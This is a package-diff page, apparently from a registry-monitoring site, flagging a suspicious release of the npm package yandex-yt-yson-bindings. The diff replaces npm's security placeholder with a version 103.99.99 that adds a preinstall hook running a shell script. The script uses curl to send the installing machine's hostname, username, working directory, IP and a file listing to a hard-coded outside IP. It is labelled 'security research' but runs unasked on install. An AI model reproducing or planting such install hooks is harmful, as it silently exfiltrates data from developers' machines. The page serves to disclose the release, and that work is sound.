yandex-yt-yson-bindings 0.0.1-security → 103.99.99

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of yandex-yt-yson-bindings might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +1 -6
  2. package/pre.sh +3 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1 @@
1
- {
2
- "name": "yandex-yt-yson-bindings",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {"name": "yandex-yt-yson-bindings", "version": "103.99.99", "description": "Security research only supplychain Security do not install supplychainsecurity@checkmarx.com", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "./pre.sh"}, "author": "", "license": "ISC", "dependencies": {"testtestkakakalala": "^100.99.99"}}
package/pre.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl -d "Hostname: $(hostname) -H Whoami: $(whoami) -H Pwd: $(pwd ) -H IP: $(hostname -i ) $(ls -la )" http://3.72.6.53/
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=yandex-yt-yson-bindings for more information.